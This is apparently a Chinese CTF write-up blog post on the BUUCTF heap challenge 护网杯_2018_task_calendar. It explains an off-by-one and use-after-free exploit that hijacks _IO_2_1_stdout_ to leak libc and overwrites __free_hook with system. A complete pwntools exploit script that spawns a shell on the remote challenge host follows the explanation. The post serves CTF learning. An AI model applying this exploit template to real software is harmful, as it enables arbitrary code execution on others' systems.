[BUUCTF-pwn] 护网杯_2018_task_calendar

最新推荐文章于 2022-11-05 21:15:07 发布
最新推荐文章于 2022-11-05 21:15:07 发布
阅读量432 收藏 1
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122564548
版权

劫持_IO_2_1_stdout_

程序没有show,需要劫持_IO_2_1_stdout_

程序有add,edit,free其中edit调用sub_B5F 会多读1个字符:off_by_one,由于有大小限制,通过这里释放得到unsortbin

__int64 __fastcall readstr_1(__int64 a1, signed int a2)
{
  char buf; // [rsp+13h] [rbp-Dh] BYREF
  unsigned int i; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v5; // [rsp+18h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; (int)i <= a2; ++i )              // 会多读入1字符
  {
    if ( (int)read(0, &buf, 1uLL) <= 0 )
    {
      puts("read error");
      exit(0);
    }
    if ( buf == 10 )
    {
      *(_BYTE *)((int)i + a1) = 0;
      return i;
    }
    *(_BYTE *)(a1 + (int)i) = buf;
  }
  return i;
}

free函数没有清理指针

void m3free()
{
  int v0; // [rsp+Ch] [rbp-4h]

  v0 = sub_C5C();
  if ( v0 != -1 )
    free((void *)qword_202060[v0]);
}

思路:

  1. 先建4个块0x68*3+0x18 (序号从1开始)第4个一是用来防止top_chunk合并,2是在后边作doublefree控制free_hook
  2. 先将2释放进tcache,再通过1修改2的头为0xe1然后释放2 块8次进入unsortbin
  3. 这里2块有tcache预留的fd指针处是main_arena 修改2 两字节为?760 半个字节爆破,让它等于_IO_2_1_stdout_ 
  4. 再建块建到_IO_2_1_stdout_ 并用p64(0xfbad1887)+p64(0)*3+p8(0x58) 覆盖,然后它会输入_IO_file_jumps 可能得到libc
  5. 前边预留的块4 doublefree后修改为free_hook再建2次建到free_hook上,然后修改为system
  6. 释放一个带/bin/sh的块得到shell

难度不大,可以当模板用,完整exp

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

def connect():
    global p,libc_elf,one,libc_start_main_ret,local
    
    local = 0
    if local == 1:
        p = process('./pwn')
    else:
        p = remote('node4.buuoj.cn', 29957) 
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
    libc_start_main_ret = 0x21b97

menu = b"choice> "
def add(idx, size):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(menu, str(idx).encode())
    p.sendlineafter(b"size> ", str(size).encode())

def free(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(menu, str(idx).encode())

def edit(idx, size, msg):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(menu, str(idx).encode())
    p.sendlineafter(b"size> ", str(size).encode())
    p.sendafter(b"info> ", msg)

def pwn():
    #context.log_level = 'debug'
    p.sendlineafter(b'input calendar name> ', b'A')
    
    add(1, 0x68)
    add(2, 0x68)
    add(3, 0x68)
    add(4, 0x18)
    free(2)
    edit(1, 0x68, b'A'*0x68 + b'\xe1')
    [free(2) for i in range(8)]
    edit(1, 0x68, b'A'*0x68 + b'\x71')

    #gdb.attach(p)
    #pause()
    #lh = int(input('lh='), 16)+1
    lh = 8
    edit(2, 1, p16(lh*0x1000 + 0x760)+b'\n') #size 1 input 2
    add(3, 0x68)
    add(3, 0x68)
    edit(3, 32, p64(0xfbad1887)+p64(0)*3+p8(0x58) ) #size 32 input 33
    
    libc_base = u64(p.recv(8)) - libc_elf.sym['_IO_file_jumps']
    libc_elf.address = libc_base
    one_gadget= libc_base + one[0] 
    
    free(4)
    free(4)
    edit(4, 7, p64(libc_elf.sym['__free_hook']))
    add(4, 0x18)
    edit(4, 7, b'/bin/sh\x00')
    add(1, 0x18)
    edit(1, 7, p64(libc_elf.sym['system']))

    free(4)
    p.sendline(b'cat /flag')
    p.interactive()

connect()
pwn()

石氏是时试
关注
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
2018护网pwn
Maxmalloc的博客
01-14 575
pwn题中 setbuf的用处
Maxmalloc的博客
10-14 3024
在我们遇到的每一个需要输入输出的pwn题中一般都会有下面这几条语句 setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stderr, 0LL, 2, 0LL); 直到今天才彻底搞明白这三句话的作用。 因为我们搭建pwn题一般都是用socat进行端口转发,pwn题搭建详情 但是socat不是一次写一行而...
攻防世界pwn——forgot
qq_62076255的博客
11-05 180
攻防世界pwn——forgot
[BUUCTF-pwn] shanghai2019_slient_note
weixin_52640415的博客
02-02 490
没有show,没开PIE,got表可写,估计就是控制got表。 只能add两个块,一个是0x28,另一个是0x208。BUU上给的是ubuntu18,没有次数限制,也不删指针明显的UAF。add时用的calloc 。 但是一是没有show,要得到libc需要控制got表,而add时用的calloc不仅会清残留还不用libc-2.27的tcache。这样如果用fastbin attack需要找一个0x3X的标记或者0x21X显示这两个都找不着。 于是想到用unlink,这个不需要标记然后控制指针区后就可
[BUUCTF-pwn] hwb2018_calendar
weixin_52640415的博客
02-04 323
我讨厌爆破,还是两次 堆地址+_IO_2_1_stdout_ 题目给了一个很明显的UAF void m3free() { int v0; // [rsp+Ch] [rbp-4h] v0 = readid(); if ( v0 != -1 ) free((void *)qword_202060[v0]); } 但是也有些限制,一是大小最大0x68,二是活动块只能建4个(这个无所谓,有俩用的就行) 另外edit里一个读入的函数有点坑,读入n+1个字符,n还不能为0,最少2个。这样
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BUUCTF-PWN-[ZJCTF 2019]Login
最新发布
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
roarctf_2019_realloc_magic 详细学习理解 无show()利用IO_FILE输出+realloc分配实现
weixin_46521144的博客
07-20 790
roarctf_2019_realloc_magic 这道题从头到尾都是我的知识盲区… 爆破,IO_FILE,realloc 学习资料 利用IO_FILE泄露libc原理 IO_FILE泄露libc例题 wp参考 realloc重要知识 静态分析 可以看出程序只有对realloc的调用操作,只有add()和delete()没有泄露函数。一般堆题如果没有show()函数,plt里面也没有system,可以采用的方法是劫持IO_FILE泄露。 IO_FILE劫持思路 对于劫持IO_FILE的思路,我的理解是
sctf_2019_easy_heap off-by-null劫持IO_FILE,理解 0ctf2015 free_note unsortedbin-double_free使用
weixin_46521144的博客
08-14 363
分析以及漏洞点 本身off-by-null没什么可以再说的,但是这道题没有show函数,就必须想到要劫持IO_FILE。但是之前就一直有个问题就是既然unsortedbin中地址无法取出,怎么能写到tcache或者fastbin中?之前许多题目因为正好有类似的漏洞,但感觉不是很普世。这次只有一个off-by-null就实现了这一点,因此看完之后恍然大悟。明白了一般性的劫持IO_FILE泄露libc的方法。 关键点:构造chunk overlapping,之后用一个大的unsortedbin包裹住这个chun
buuctf realloc _IO_2_1_stdout_泄露libc地址 32位格式化字符串 UAF diff SSH SCP jmp-rsp orw seccomp_tools
carol2358的博客
08-01 775
文章目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic 贴几个链接: https://blog.csdn.net/weixin_44145820/article/details/105585889 https://blog.csdn.net/seaaseesa/article/details/105590591 https://blog.csdn.net/weixin_42151611/article/details/99228675 exp:
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1349
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
nsctf_online_2019_pwn1(劫持IO_2_1_stdout来泄露地址)
seaaseesa的博客
04-30 1355
nsctf_online_2019_pwn1 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Edit功能里存在一个null off by one漏洞 没有show功能 我们可以利用fastbin attack,修改IO_2_1_stdout的_IO_write_base,这样,当再次调用puts或printf的时候,就会泄露出_IO_write_base~_IO_...
ctf pwn 个人经验记录
jmp esp
05-22 8938
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
pwn 进阶(1)
weixin_44113469的博客
02-07 950
pwn 进阶(1) 0x01 XCTF 高校战’疫’分享赛复盘 easyheap free后指针残留,可以溢出,最后要造成一个任意写 from pwn import* context.log_level = "debug" #p = process("./easyheap") p = remote("121.36.209.145",9997) elf = ELF("./libc.so.6") def new(size,content,test): p.recvuntil("choice:")
pwn学习总结(二) —— 基础知识(持续更新)
qq_41988448的博客
11-19 981
pwn学习总结(四) —— 基础知识(持续更新)PLT表&GOT表 PLT表&GOT表 PLT表:指向GOT表,作用是动态加载函数地址 GOT表:位于数据段,函数被调用时,成员为函数在内存中的实际地址 ...
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值